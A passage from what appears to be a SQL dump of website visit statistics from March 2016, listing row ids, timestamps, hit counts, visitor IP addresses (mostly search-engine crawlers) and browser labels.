ther'),(17057,1457483439,2,0,2,0,'66.249.66.158',''),(17058,1457483555,2,0,2,0,'66.249.66.162',''),(17059,1457483695,1,0,1,0,'66.249.66.166',''),(17060,1457483786,1,1,0,0,'217.69.133.217','other'),(17061,1457484487,1,1,0,0,'217.69.133.230','other'),(17062,1457484531,1,1,0,0,'217.69.143.71','other'),(17063,1457484972,1,1,0,0,'217.69.133.218','other'),(17064,1457485252,3,0,3,0,'66.249.66.166',''),(17065,1457485480,1,0,1,0,'66.249.66.158',''),(17066,1457485755,1,1,0,0,'178.154.189.201','other'),(17067,1457485808,1,1,0,0,'5.255.253.53','other'),(17068,1457485812,1,1,0,0,'141.8.132.76','other'),(17069,1457485816,1,1,0,0,'141.8.132.97','other'),(17070,1457486033,1,1,0,0,'130.193.51.22','other'),(17071,1457486265,1,0,1,0,'66.249.66.162',''),(17072,1457486501,1,0,1,0,'66.249.66.166',''),(17073,1457486590,1,1,0,0,'66.249.92.99','other'),(17074,1457486693,1,1,0,0,'217.69.143.52','other'),(17075,1457486751,2,2,0,0,'213.79.122.153','firefox'),(17076,1457487617,1,1,0,0,'217.69.133.216','other'),(17077,1457487637,2,0,2,0,'66.249.66.158',''),(17078,1457487663,1,1,0,0,'217.69.143.44','other'),(17079,1457487668,1,0,1,0,'66.249.66.133',''),(17080,1457487839,1,0,1,0,'66.249.66.129',''),(17081,1457487945,1,1,0,0,'217.69.143.65','other'),(17082,1457488087,1,0,1,0,'66.249.66.166',''),(17083,1457488147,1,1,0,0,'130.193.51.45','other'),(17084,1457488151,2,2,0,0,'141.8.132.97','other'),(17085,1457488340,1,1,0,0,'141.8.142.10','other'),(17086,1457488344,1,1,0,0,'141.8.184.22','other'),(17087,1457488353,1,1,0,0,'130.193.51.102','other'),(17088,1457488357,1,1,0,0,'5.255.253.110','other'),(17089,1457488361,1,1,0,0,'141.8.142.88','other'),(17090,1457488365,1,1,0,0,'5.255.253.30','other'),(17091,1457488370,1,1,0,0,'5.255.253.55','other'),(17092,1457488375,1,1,0,0,'141.8.132.76','other'),(17093,1457488378,1,1,0,0,'141.8.132.79','other'),(17094,1457488382,1,1,0,0,'130.193.37.27','other'),(17095,1457488387,1,1,0,0,'141.8.142.41','other'),(17096,1457488391,1,1,0,0,'130.193.51.85','other'),(17097,1457488445,1,1,0,0,'217.69.133.67','other'),(17098,1457488446,1,1,0,0,'217.69.133.215','other'),(17099,1457488454,1,1,0,0,'37.187.94.142','other'),(17100,1457488659,1,1,0,0,'66.249.93.90','other'),(17101,1457488765,2,0,2,0,'66.249.66.162',''),(17102,1457488779,3,0,3,0,'66.249.66.158',''),(17103,1457489101,1,1,0,0,'217.69.143.44','other'),(17104,1457489277,1,0,1,0,'68.180.229.232',''),(17105,1457489371,1,1,0,0,'217.69.133.218','other'),(17106,1457489373,1,1,0,0,'217.69.133.85','other'),(17107,1457489407,1,1,0,0,'217.69.133.221','other'),(17108,1457489521,1,1,0,0,'66.249.66.166','other'),(17109,1457489645,1,1,0,0,'66.249.66.133','other'),(17110,1457489697,1,1,0,0,'37.187.94.112','other'),(17111,1457490204,1,1,0,0,'130.193.37.21','other'),(17112,1457490209,1,1,0,0,'5.255.253.100','other'),(17113,1457490214,1,1,0,0,'130.193.51.45','other'),(17114,1457490217,1,1,0,0,'130.193.51.43','other'),(17115,1457490221,1,1,0,0,'93.158.152.26','other'),(17116,1457490226,1,1,0,0,'141.8.142.10','other'),(17117,1457490230,1,1,0,0,'5.255.253.55','other'),(17118,1457490315,1,1,0,0,'180.76.15.18','other'),(17119,1457490349,1,1,0,0,'51.255.65.94','other'),(17120,1457490666,1,0,1,0,'66.249.66.166',''),(17121,1457490712,1,1,0,0,'217.69.133.226','other'),(17122,1457491218,1,1,0,0,'51.255.65.87','other'),(17123,1457491487,1,0,1,0,'66.249.66.162',''),(17124,1457491944,1,1,0,0,'8.29.198.26','other'),(17125,1457492049,1,0,1,0,'66.249.66.158',''),(17126,1457492141,2,1,1,0,'66.249.66.166',''),(17127,1457492255,1,1,0,0,'217.69.143.52','other'),(17128,1457492374,2,1,1,0,'66.249.66.162',''),(17129,1457492602,1,1,0,0,'66.249.93.86','other'),(17130,1457492755,1,0,1,0,'66.249.66.129',''),(17131,1457492993,1,0,1,0,'68.180.229.232',''),(17132,1457493089,1,1,0,0,'217.69.133.218','other'),(17133,1457493090,1,1,0,0,'217.69.133.217','other'),(17135,1457493324,1,0,1,0,'66.249.66.158',''),(17136,1457493581,1,1,0,0,'141.8.184.22','other'),(17137,1457493825,1,1,0,0,'79.172.193.32','chrome'),(17138,1457493931,1,1,0,0,'162.247.72.212','chrome'),(17139,1457494053,3,0,3,0,'66.249.66.162',''),(17140,1457494234,1,1,0,0,'37.187.94.63','other'),(17141,1457494730,3,0,3,0,'68.180.229.232',''),(17142,1457494970,1,0,1,0,'66.249.66.158',''),(17143,1457494977,2,0,2,0,'66.249.66.162',''),(17144,1457495006,2,2,0,0,'217.69.133.217','other'),(17145,1457495007,1,1,0,0,'217.69.133.215','other'),(17146,1457495053,1,1,0,0,'217.69.133.225','other'),(17147,1457495054,1,1,0,0,'217.69.133.222','other'),(17148,1457495447,1,1,0,0,'66.249.66.158','other'),(17149,1457495480,1,1,0,0,'217.69.143.48','other'),(17150,1457495579,2,2,0,0,'141.8.183.14','other'),(17151,1457495583,3,3,0,0,'93.158.152.9','other'),(17152,1457495588,2,2,0,0,'130.193.37.21','other'),(17153,1457495596,2,2,0,0,'5.255.253.53','other'),(17154,1457495609,2,2,0,0,'141.8.184.18','other'),(17155,1457495950,1,0,1,0,'66.249.66.166',''),(17156,1457496036,1,1,0,0,'178.154.149.11','other'),(17157,1457496085,1,1,0,0,'66.249.93.86','other'),(17158,1457496315,1,1,0,0,'217.69.133.221','other'),(17159,1457496353,1,0,1,0,'66.249.66.158',''),(17160,1457496834,1,0,1,0,'66.249.66.162',''),(17161,1457496835,1,1,0,0,'66.249.66.129','other'),(17162,1457497270,1,1,0,0,'66.249.92.99','other'),(17163,1457497401,1,0,1,0,'66.249.66.158',''),(17164,1457497813,1,1,0,0,'217.69.143.67','other'),(17165,1457498127,1,1,0,0,'51.255.65.43','other'),(17166,1457498328,1,0,1,0,'66.249.66.166',''),(17167,1457498343,3,0,3,0,'66.249.66.158',''),(17168,1457498376,1,1,0,0,'37.187.94.67','other'),(17169,1457498642,1,1,0,0,'157.55.39.70','other'),(17170,1457498745,1,1,0,0,'217.69.133.215','other'),(17171,1457498838,1,1,0,0,'217.69.143.51','other'),(17172,1457499308,4,0,4,0,'66.249.66.166',''),(17173,1457499438,2,0,2,0,'68.180.229.232',''),(17174,1457499674,1,1,0,0,'66.249.93.94','other'),(17175,1457499701,1,1,0,0,'217.69.133.84','other'),(17176,1457499944,1,1,0,0,'66.249.66.158','other'),(17177,1457500162,3,0,3,0,'66.249.66.162',''),(17178,1457500290,1,1,0,0,'207.241.229.31','other'),(17179,1457500432,1,0,1,0,'66.249.66.166',''),(17180,1457500632,1,1,0,0,'217.69.133.84','other'),(17181,1457501264,1,1,0,0,'51.255.65.90','other'),(17182,1457501499,1,1,0,0,'217.69.133.218','other'),(17183,1457501501,1,0,1,0,'66.249.66.162',''),(17184,1457501556,1,1,0,0,'93.158.152.202','other'),(17185,1457501580,2,2,0,0,'178.154.149.11','other'),(17186,1457501583,5,5,0,0,'141.8.184.18','other'),(17187,1457501656,1,1,0,0,'51.255.65.70','other'),(17188,1457501725,2,0,2,0,'66.249.66.158',''),(17189,1457501774,1,1,0,0,'217.69.133.216','other'),(17190,1457502215,1,1,0,0,'217.69.143.57','other'),(17191,1457502301,1,1,0,0,'217.69.133.225','other'),(17192,1457502303,1,1,0,0,'217.69.133.224','other'),(17193,1457502380,1,1,0,0,'51.255.65.30','other'),(17194,1457502645,1,1,0,0,'66.249.66.129','other'),(17195,1457502763,2,1,1,0,'66.249.66.158',''),(17196,1457502817,1,1,0,0,'8.29.198.25','other'),(17197,1457502986,1,1,0,0,'130.193.37.27','other'),(17198,1457502990,1,1,0,0,'141.8.142.55','other'),(17199,1457502994,1,1,0,0,'141.8.132.109','other'),(17200,1457502998,1,1,0,0,'141.8.142.60','other'),(17201,1457503004,1,1,0,0,'141.8.132.44','other'),(17202,1457503008,1,1,0,0,'141.8.132.74','other'),(17203,1457503026,2,0,2,0,'66.249.66.166',''),(17204,1457503047,3,0,3,0,'66.249.66.162',''),(17205,1457503252,1,1,0,0,'66.249.93.90','other'),(17206,1457503709,3,0,3,0,'66.249.66.158',''),(17207,1457503723,1,1,0,0,'91.196.178.71','firefox'),(17208,1457503995,2,2,0,0,'66.249.66.158','other'),(17209,1457504426,1,1,0,0,'217.69.143.60','other'),(17210,1457504478,6,6,0,0,'82.193.127.15','other'),(17211,1457504532,3,0,3,0,'66.249.66.162',''),(17212,1457504779,1,1,0,0,'180.76.15.28','other'),(17213,1457505027,1,1,0,0,'5.255.253.110','other'),(17214,1457505030,1,1,0,0,'5.255.253.53','other'),(17215,1457505034,1,1,0,0,'141.8.132.97','other'),(17216,1457505039,2,2,0,0,'141.8.184.18','other'),(17217,1457505043,1,1,0,0,'141.8.132.99','other'),(17218,1457505315,1,1,0,0,'207.46.13.171','other'),(17219,1457505483,4,1,3,0,'66.249.66.158',''),(17220,1457505488,1,1,0,0,'217.69.133.216','other'),(17221,1457505489,1,1,0,0,'217.69.133.85','other'),(17222,1457505555,1,0,1,0,'66.249.66.162',''),(17223,1457505590,1,1,0,0,'37.187.95.3','other'),(17224,1457505874,1,1,0,0,'141.8.132.109','other'),(17225,1457505875,2,0,2,0,'68.180.229.232',''),(17226,1457505878,1,1,0,0,'5.255.253.103','other'),(17228,1457505881,1,1,0,0,'141.8.183.14','other'),(17229,1457505885,1,1,0,0,'141.8.142.60','other'),(17230,1457506010,2,0,2,0,'66.249.66.166',''),(17231,1457506177,1,1,0,0,'217.69.143.62','other'),(17232,1457506267,1,1,0,0,'51.255.65.67','other'),(17233,1457506315,1,1,0,0,'66.249.93.94','firefox'),(17234,1457506369,230,230,0,0,'82.193.127.15','other'),(17235,1457506870,1,1,0,0,'66.249.93.86','other'),(17236,1457506879,3,0,3,0,'66.249.66.158',''),(17237,1457506881,1,0,1,0,'66.249.66.162',''),(17238,1457506884,1,1,0,0,'91.196.178.67','firefox'),(17239,1457506899,1,1,0,0,'217.69.143.49','other'),(17240,1457506930,2,1,1,0,'66.249.66.162',''),(17241,1457507014,1,0,1,0,'66.249.66.190',''),(17242,1457507063,1,1,0,0,'157.55.39.70','other'),(17243,1457507113,1,1,0,0,'62.210.215.100','chrome'),(17244,1457507260,1,0,1,0,'68.180.229.232',''),(17245,1457507351,1,0,1,0,'66.249.66.166',''),(17246,1457507358,1,1,0,0,'217.69.133.67','other'),(17247,1457507372,1,0,1,0,'66.249.66.133',''),(17248,1457507401,2,1,1,0,'66.249.66.158',''),(17249,1457507457,1,1,0,0,'141.8.183.14','other'),(17250,1457507462,3,3,0,0,'141.8.132.99','other'),(17251,1457507467,1,1,0,0,'130.193.51.55','other'),(17252,1457507470,1,1,0,0,'141.8.142.82','other'),(17253,1457507474,1,1,0,0,'178.154.149.9','other'),(17254,1457507479,1,1,0,0,'93.158.152.81','other'),(17255,1457507487,1,1,0,0,'5.255.253.100','other'),(17256,1457507491,1,1,0,0,'130.193.51.43','other'),(17257,1457507496,1,1,0,0,'141.8.142.10','other'),(17258,1457507500,1,1,0,0,'130.193.51.81','other'),(17259,1457507505,1,1,0,0,'130.193.51.102','other'),(17260,1457507509,1,1,0,0,'5.255.253.110','other'),(17261,1457507513,1,1,0,0,'5.255.253.30','other'),(17262,1457507517,1,1,0,0,'5.255.253.55','other'),(17263,1457507522,1,1,0,0,'130.193.37.27','other'),(17264,1457507526,1,1,0,0,'178.154.189.6','other'),(17265,1457507530,1,1,0,0,'141.8.142.55','other'),(17266,1457507534,1,1,0,0,'141.8.184.11','other'),(17267,1457507539,3,3,0,0,'141.8.184.18','other'),(17268,1457507542,1,1,0,0,'217.69.133.225','other'),(17269,1457507543,1,1,0,0,'141.8.132.44','other'),(17270,1457507547,1,1,0,0,'141.8.184.22','other'),(17271,1457507848,1,1,0,0,'91.196.178.161','chrome'),(17272,1457508167,2,0,2,0,'66.249.66.162',''),(17273,1457508285,1,0,1,0,'66.249.66.166',''),(17274,1457508313,1,1,0,0,'217.69.143.49','other'),(17275,1457508340,1,1,0,0,'66.249.92.95','other'),(17276,1457508416,1,1,0,0,'94.179.77.87','firefox'),(17277,1457509446,1,1,0,0,'51.255.65.73','other'),(17278,1457509685,1,1,0,0,'91.196.178.71','firefox'),(17279,1457510224,1,1,0,0,'66.102.9.104','firefox'),(17280,1457510277,2,1,1,0,'66.249.66.158',''),(17281,1457510419,2,0,2,0,'66.249.66.166',''),(17282,1457510466,1,1,0,0,'66.249.93.86','other'),(17283,1457510540,1,1,0,0,'91.197.144.194','firefox'),(17284,1457510543,1,1,0,0,'92.112.244.53','firefox'),(17285,1457510555,1,0,1,0,'66.249.66.129',''),(17286,1457510565,2,2,0,0,'217.69.133.216','other'),(17287,1457511084,2,0,2,0,'66.249.66.162',''),(17288,1457511179,1,1,0,0,'217.69.133.218','other'),(17289,1457511180,1,1,0,0,'217.69.133.84','other'),(17290,1457511204,1,0,1,0,'66.249.66.158',''),(17291,1457511210,1,1,0,0,'141.8.142.8','other'),(17292,1457511214,1,1,0,0,'5.255.253.55','other'),(17293,1457511218,1,1,0,0,'141.8.132.74','other'),(17294,1457511222,1,1,0,0,'141.8.132.97','other'),(17295,1457511544,1,1,0,0,'51.255.65.60','other'),(17296,1457511604,1,1,0,0,'217.69.133.221','other'),(17297,1457511606,1,1,0,0,'217.69.133.220','other'),(17298,1457511779,1,1,0,0,'217.69.133.85','other'),(17299,1457511780,1,1,0,0,'217.69.133.67','other'),(17300,1457511782,1,1,0,0,'217.69.133.217','other'),(17301,1457511836,2,2,0,0,'217.69.143.63','other'),(17302,1457512164,2,0,2,0,'66.249.66.162',''),(17303,1457512220,1,1,0,0,'37.187.95.105','other'),(17304,1457512273,1,1,0,0,'37.187.95.162','other'),(17305,1457512445,1,1,0,0,'37.187.94.9','other'),(17306,1457512542,28,0,28,0,'66.249.66.158',''),(17307,1457512572,1,1,0,0,'217.69.133.84','other'),(17308,1457512700,1,1,0,0,'217.69.143.70','other'),(17309,1457512772,1,0,1,0,'66.249.66.166',''),(17310,1457512886,1,1,0,0,'91.124.182.203','firefox'),(17311,1457512924,1,1,0,0,'217.69.133.223','other'),(17313,1457512925,1,1,0,0,'217.69.133.220','other'),(17314,1457513014,1,1,0,0,'91.196.178.71','firefox'),(17315,1457513081,1,1,0,0,'51.255.65.49','other'),(17316,1457513423,1,0,1,0,'66.249.66.162',''),(17317,1457513664,1,1,0,0,'8.29.198.25','other'),(17318,1457513826,1,1,0,0,'62.210.215.100','chrome'),(17319,1457513827,1,1,0,0,'5.135.193.215','chrome'),(17320,1457513919,1,0,1,0,'66.249.66.158',''),(17321,1457513953,1,1,0,0,'51.255.65.29','other'),(17322,1457514304,1,1,0,0,'78.111.185.222','firefox'),(17323,1457514539,1,1,0,0,'91.196.178.69','chrome'),(17324,1457514585,1,1,0,0,'217.69.143.55','other'),(17325,1457514586,1,1,0,0,'217.69.143.57','other'),(17326,1457514676,1,1,0,0,'5.83.23.12','chrome'),(17327,1457514917,1,0,1,0,'66.249.66.162',''),(17328,1457514932,9,0,9,0,'66.249.66.158',''),(17329,1457515382,1,1,0,0,'217.69.133.85','other'),(17330,1457515391,1,1,0,0,'37.187.94.217','other'),(17331,1457515525,7,7,0,0,'141.8.184.18','other'),(17332,1457515530,1,1,0,0,'93.158.152.9','other'),(17333,1457515534,2,2,0,0,'141.8.183.14','other'),(17334,1457515538,4,4,0,0,'178.154.149.11','other'),(17335,1457515766,1,1,0,0,'176.119.24.202','chrome'),(17336,1457515796,1,1,0,0,'37.187.94.137','other'),(17337,1457515859,1,1,0,0,'94.179.77.135','chrome'),(17338,1457515967,1,1,0,0,'51.255.65.17','other'),(17339,1457516095,1,1,0,0,'51.255.65.31','other'),(17340,1457516109,1,1,0,0,'91.196.178.169','opera'),(17341,1457516211,2,2,0,0,'94.179.77.87','firefox'),(17342,1457516352,1,1,0,0,'217.69.133.215','other'),(17344,1457516389,1,1,0,0,'66.249.93.86','firefox'),(17345,1457516671,2,0,2,0,'66.249.66.162',''),(17346,1457516704,1,1,0,0,'178.137.209.56','firefox'),(17347,1457516828,1,1,0,0,'180.76.15.153','other'),(17348,1457516873,1,0,1,0,'66.249.66.166',''),(17349,1457516924,1,1,0,0,'91.196.178.161','chrome'),(17350,1457517250,1,1,0,0,'37.187.94.11','other'),(17351,1457517409,1,1,0,0,'217.69.133.223','other'),(17352,1457517411,3,3,0,0,'217.69.133.226','other'),(17353,1457517434,1,1,0,0,'62.210.215.100','chrome'),(17354,1457517588,1,1,0,0,'94.179.77.87','firefox'),(17355,1457517684,2,0,2,0,'66.249.66.158',''),(17356,1457517991,1,0,1,0,'66.249.66.166',''),(17357,1457518020,1,1,0,0,'207.46.13.43','other'),(17358,1457518024,1,1,0,0,'217.69.133.221','other'),(17359,1457518145,1,1,0,0,'217.69.133.216','other'),(17360,1457518146,1,1,0,0,'217.69.133.215','other'),(17361,1457518176,1,1,0,0,'207.46.13.171','other'),(17362,1457518206,1,1,0,0,'91.196.179.69','chrome'),(17363,1457518216,2,2,0,0,'178.154.149.11','other'),(17364,1457518220,2,2,0,0,'93.158.152.9','other'),(17365,1457518225,2,2,0,0,'141.8.183.14','other'),(17366,1457518229,1,1,0,0,'141.8.184.18','other'),(17367,1457518274,2,0,2,0,'66.249.66.162',''),(17368,1457518500,1,1,0,0,'91.196.178.37','firefox'),(17369,1457518691,1,1,0,0,'66.249.92.95','other'),(17370,1457519030,1,1,0,0,'217.69.143.57','other'),(17371,1457519305,1,1,0,0,'91.196.178.72','chrome'),(17372,1457519450,1,0,1,0,'66.249.66.166',''),(17373,1457519582,4,0,4,0,'66.249.66.162',''),(17374,1457519792,4,0,4,0,'68.180.229.232',''),(17375,1457520115,1,1,0,0,'182.118.25.214','msie'),(17376,1457520338,1,1,0,0,'217.69.143.67','other'),(17377,1457520343,19,0,19,0,'66.249.66.158',''),(17378,1457520520,6,6,0,0,'141.8.183.14','other'),(17379,1457520524,4,4,0,0,'141.8.184.18','other'),(17380,1457520528,1,1,0,0,'130.193.37.21','other'),(17381,1457520550,1,1,0,0,'178.154.149.11','other'),(17382,1457520554,1,1,0,0,'5.255.253.53','other'),(17383,1457520567,1,1,0,0,'93.158.152.9','other'),(17384,1457520572,1,1,0,0,'91.196.178.129','firefox'),(17385,1457520718,1,0,1,0,'66.249.66.162',''),(17386,1457520991,1,1,0,0,'78.111.187.66','chrome'),(17387,1457521035,1,0,1,0,'66.249.66.166',''),(17388,1457521732,1,1,0,0,'217.69.143.69','other'),(17389,1457521862,1,1,0,0,'37.187.94.39','other'),(17390,1457522068,1,1,0,0,'217.69.133.217','other'),(17391,1457522069,1,1,0,0,'217.69.133.216','other'),(17392,1457522070,1,1,0,0,'217.69.133.219','other'),(17394,1457522187,3,3,0,0,'178.154.149.11','other'),(17395,1457522195,4,4,0,0,'141.8.184.18','other'),(17396,1457522283,2,2,0,0,'178.154.189.204','other'),(17397,1457522420,1,1,0,0,'51.255.65.93','other'),(17398,1457522502,1,0,1,0,'68.180.229.232',''),(17399,1457522508,1,1,0,0,'91.196.178.163','chrome'),(17400,1457522510,1,0,1,0,'66.249.66.162',''),(17401,1457522625,1,1,0,0,'217.69.143.46','other'),(17402,1457523022,1,1,0,0,'217.69.133.215','other'),(17403,1457523075,1,1,0,0,'217.69.143.66','other'),(17404,1457523206,16,16,0,0,'141.8.184.18','other'),(17405,1457523306,1,1,0,0,'178.94.251.254','chrome'),(17406,1457523341,2,0,2,0,'66.249.66.166',''),(17407,1457523480,1,1,0,0,'217.69.133.225','other'),(17408,1457523687,1,1,0,0,'195.10.210.49','firefox'),(17409,1457523747,6,6,0,0,'130.193.51.45','other'),(17410,1457523748,14,14,0,0,'141.8.132.99','other'),(17411,1457523749,8,8,0,0,'130.193.37.21','other'),(17412,1457523754,14,14,0,0,'5.255.253.53','other'),(17413,1457523757,7,7,0,0,'5.255.253.100','other'),(17414,1457523759,16,16,0,0,'178.154.149.11','other'),(17415,1457523764,11,11,0,0,'93.158.152.9','other'),(17416,1457523792,13,13,0,0,'141.8.183.14','other'),(17417,1457523941,6,0,6,0,'66.249.66.158',''),(17418,1457524289,1,1,0,0,'37.187.95.155','other'),(17419,1457524460,8,8,0,0,'141.8.184.18','other'),(17420,1457524557,1,1,0,0,'8.29.198.26','other'),(17421,1457524607,1,1,0,0,'217.69.133.221','other'),(17422,1457525268,1,1,0,0,'207.46.13.43','other'),(17423,1457525579,1,0,1,0,'66.249.66.130',''),(17424,1457525798,9,9,0,0,'136.243.172.46','chrome'),(17426,1457525813,1,0,1,0,'68.180.229.232',''),(17427,1457526112,1,1,0,0,'141.8.184.18','other'),(17428,1457526113,2,2,0,0,'178.154.149.11','other'),(17429,1457526240,2,2,0,0,'94.179.77.135','chrome'),(17430,1457526400,1,1,0,0,'217.69.133.219','other'),(17431,1457526646,1,1,0,0,'217.69.133.85','other'),(17432,1457526647,1,1,0,0,'217.69.133.84','other'),(17433,1457526692,1,0,1,0,'66.249.66.130',''),(17434,1457526764,2,0,2,0,'66.249.66.186',''),(17435,1457526995,1,1,0,0,'37.187.95.63','other'),(17436,1457527183,1,1,0,0,'91.196.178.67','chrome'),(17437,1457527788,1,1,0,0,'217.69.133.67','other'),(17438,1457527831,34,0,34,0,'66.249.66.186',''),(17439,1457528012,4,4,0,0,'178.154.149.11','other'),(17440,1457528016,6,6,0,0,'141.8.184.18','other'),(17441,1457528029,2,2,0,0,'141.8.183.14','other'),(17442,1457528034,2,2,0,0,'93.158.152.9','other'),(17443,1457528055,4,4,0,0,'51.254.129.9','other'),(17444,1457528369,1,1,0,0,'91.196.178.129','chrome'),(17445,1457528509,1,1,0,0,'37.187.95.34','other'),(17446,1457528578,1,1,0,0,'217.69.133.219','other'),(17447,1457528615,1,1,0,0,'91.196.178.71','firefox'),(17448,1457528710,1,1,0,0,'217.69.143.70','other'),(17449,1457528860,1,1,0,0,'217.69.133.223','other'),(17450,1457528884,1,1,0,0,'91.124.15.174','opera'),(17451,1457529123,1,1,0,0,'37.25.11.241','chrome'),(17452,1457529286,3,3,0,0,'178.154.149.11','other'),(17453,1457529290,7,7,0,0,'141.8.184.18','other'),(17454,1457529294,1,1,0,0,'130.193.37.21','other'),(17455,1457529309,1,1,0,0,'141.8.183.14','other'),(17456,1457529313,2,2,0,0,'93.158.152.9','other'),(17457,1457529367,1,1,0,0,'91.196.178.69','chrome'),(17458,1457529507,1,1,0,0,'78.111.186.171','chrome'),(17459,1457529564,1,1,0,0,'91.196.178.67','chrome'),(17460,1457529760,1,0,1,0,'66.249.66.130',''),(17461,1457529804,1,1,0,0,'91.196.178.67','firefox'),(17462,1457529910,1,1,0,0,'66.249.92.124','other'),(17463,1457530010,1,1,0,0,'37.52.41.140','chrome'),(17464,1457530306,1,1,0,0,'141.8.132.99','other'),(17465,1457530310,2,2,0,0,'141.8.184.18','other'),(17466,1457530349,2,2,0,0,'141.8.183.14','other'),(17467,1457530374,2,2,0,0,'37.73.242.204','chrome'),(17468,1457530931,1,1,0,0,'91.196.178.69','firefox'),(17469,1457531021,1,1,0,0,'91.196.178.69','chrome'),(17470,1457531054,1,1,0,0,'195.64.182.23','chrome'),(17471,1457531135,2,0,2,0,'68.180.229.232',''),(17472,1457531342,1,1,0,0,'91.196.178.70','chrome'),(17473,1457531374,1,0,1,0,'66.249.66.134',''),(17474,1457531401,1,0,1,0,'66.249.66.130',''),(17475,1457531403,1,1,0,0,'91.196.178.40','firefox'),(17476,1457531486,1,1,0,0,'217.69.143.70','other'),(17477,1457531625,2,2,0,0,'178.154.149.11','other'),(17478,1457531870,2,2,0,0,'195.68.216.88','chrome'),(17479,1457531937,2,2,0,0,'141.8.183.14','other'),(17480,1457531941,1,1,0,0,'91.196.178.169','msie'),(17481,1457532049,1,1,0,0,'144.76.4.148','other'),(17482,1457532227,1,1,0,0,'217.69.143.48','other'),(17483,1457532257,1,1,0,0,'78.111.186.25','firefox'),(17484,1457532311,1,1,0,0,'176.241.109.94','firefox'),(17485,1457532343,1,1,0,0,'217.69.133.217','other'),(17486,1457532614,2,2,0,0,'141.8.184.18','other'),(17487,1457532623,4,4,0,0,'178.154.149.11','other'),(17488,1457532827,1,1,0,0,'91.196.178.67','chrome'),(17489,1457532875,1,1,0,0,'217.69.133.67','other'),(17490,1457532896,1,1,0,0,'217.69.143.67','other'),(17491,1457533087,1,1,0,0,'66.249.66.186','other'),(17492,1457533156,1,1,0,0,'91.196.178.70','firefox'),(17493,1457533189,1,1,0,0,'180.76.15.135','other'),(17494,1457533366,1,1,0,0,'78.152.161.56','chrome'),(17495,1457533505,1,0,1,0,'66.249.66.178',''),(17496,1457533539,2,0,2,0,'66.249.66.146',''),(17497,1457533640,1,1,0,0,'51.255.65.59','other'),(17498,1457533842,1,1,0,0,'37.204.156.45','msie'),(17499,1457533971,1,1,0,0,'37.187.95.27','other'),(17500,1457533997,6,6,0,0,'141.8.184.18','other'),(17501,1457533998,1,1,0,0,'213.169.70.201','firefox'),(17502,1457534256,1,0,1,0,'68.180.229.232',''),(17503,1457534305,4,4,0,0,'93.158.152.9','other'),(17504,1457534329,2,2,0,0,'46.211.2.135','other'),(17505,1457534347,1,1,0,0,'217.69.143.62','other'),(17506,1457534348,1,1,0,0,'217.69.143.63','other'),(17507,1457534407,1,1,0,0,'141.8.183.14','other'),(17508,1457534411,1,1,0,0,'130.193.37.21','other'),(17509,1457534468,1,1,0,0,'217.69.133.218','other'),(17510,1457534470,1,1,0,0,'217.69.133.219','other'),(17511,1457534524,1,1,0,0,'51.255.65.90','other'),(17512,1457534554,1,0,1,0,'66.249.66.146',''),(17513,1457534622,1,0,1,0,'66.249.66.169',''),(17514,1457534651,1,0,1,0,'66.249.66.154',''),(17515,1457534659,4,4,0,0,'94.154.239.69','other'),(17516,1457534989,3,0,3,0,'66.249.66.158',''),(17517,1457535052,2,2,0,0,'141.8.184.18','other'),(17518,1457535374,1,1,0,0,'8.29.198.26','other'),(17519,1457535470,1,1,0,0,'217.69.133.222','other'),(17520,1457535512,1,1,0,0,'91.196.178.71','firefox'),(17521,1457535719,1,1,0,0,'93.158.152.9','other'),(17522,1457535734,1,1,0,0,'77.52.180.166','firefox'),(17523,1457535760,1,1,0,0,'217.69.143.52','other'),(17524,1457535772,1,1,0,0,'217.69.133.220','other'),(17525,1457535773,1,1,0,0,'213.179.252.53','chrome'),(17527,1457536017,1,1,0,0,'37.187.95.154','other'),(17528,1457536063,1,0,1,0,'66.249.66.146',''),(17529,1457536327,1,1,0,0,'130.193.51.43','other'),(17530,1457536330,1,1,0,0,'141.8.132.79','other'),(17531,1457536769,1,1,0,0,'5.255.253.55','other'),(17532,1457537113,5,5,0,0,'178.154.149.11','other'),(17533,1457537117,1,1,0,0,'217.69.143.70','other'),(17534,1457537118,37,37,0,0,'141.8.184.18','other'),(17535,1457537208,1,1,0,0,'180.76.15.30','other'),(17536,1457537292,1,1,0,0,'141.8.183.14','other'),(17537,1457537350,1,1,0,0,'66.249.66.146','other'),(17538,1457537742,1,1,0,0,'51.255.65.7','other'),(17539,1457537769,1,0,1,0,'68.180.229.232',''),(17540,1457537844,1,1,0,0,'37.187.94.9','other'),(17541,1457538023,1,1,0,0,'46.63.43.97','firefox'),(17542,1457538179,1,0,1,0,'66.249.66.158',''),(17543,1457538292,1,1,0,0,'46.201.240.112','firefox'),(17544,1457538597,1,1,0,0,'66.249.66.172','other'),(17545,1457538679,1,1,0,0,'66.249.66.158','other'),(17546,1457539190,2,2,0,0,'37.54.23.170','chrome'),(17547,1457539336,1,1,0,0,'217.69.143.43','other'),(17548,1457539658,7,7,0,0,'178.154.149.11','other'),(17549,1457539663,8,8,0,0,'141.8.183.14','other'),(17550,1457539712,1,1,0,0,'217.69.133.216','other'),(17551,1457539713,1,1,0,0,'217.69.133.218','other'),(17552,1457539828,1,1,0,0,'217.69.133.222','other'),(17553,1457539829,1,1,0,0,'217.69.133.226','other'),(17554,1457539830,1,1,0,0,'217.69.133.220','other'),(17555,1457540034,28,28,0,0,'141.8.184.18','other'),(17556,1457540037,2,0,2,0,'68.180.229.232',''),(17557,1457540042,7,7,0,0,'93.158.152.9','other'),(17558,1457540063,2,2,0,0,'5.255.253.53','other'),(17559,1457540121,1,1,0,0,'37.187.94.212','other'),(17560,1457540241,1,1,0,0,'66.249.92.83','other'),(17561,1457540847,1,0,1,0,'66.249.66.154',''),(17562,1457540906,137,137,0,0,'94.154.239.69','other'),(17563,1457541058,2,2,0,0,'217.69.133.216','other'),(17564,1457541276,3,0,3,0,'66.249.66.146',''),(17565,1457541334,1,1,0,0,'217.69.143.56','other'),(17566,1457541348,1,1,0,0,'217.69.133.222','other'),(17567,1457541358,1,1,0,0,'91.124.182.203','firefox'),(17568,1457541438,1,1,0,0,'78.111.185.196','chrome'),(17569,1457541745,2,0,2,0,'66.249.66.158',''),(17570,1457541758,1,0,1,0,'66.249.66.154',''),(17571,1457542151,1,1,0,0,'5.255.253.9','other'),(17573,1457542175,3,3,0,0,'62.210.107.201','other'),(17574,1457542201,2,0,2,0,'66.249.66.146',''),(17575,1457542214,1,1,0,0,'5.255.253.55','other'),(17576,1457542215,1,1,0,0,'130.193.51.85','other'),(17577,1457542216,1,1,0,0,'130.193.51.7','other'),(17578,1457542217,1,1,0,0,'5.255.253.53','other'),(17580,1457543203,1,1,0,0,'109.162.69.216','firefox'),(17581,1457543257,1,1,0,0,'217.69.133.218','other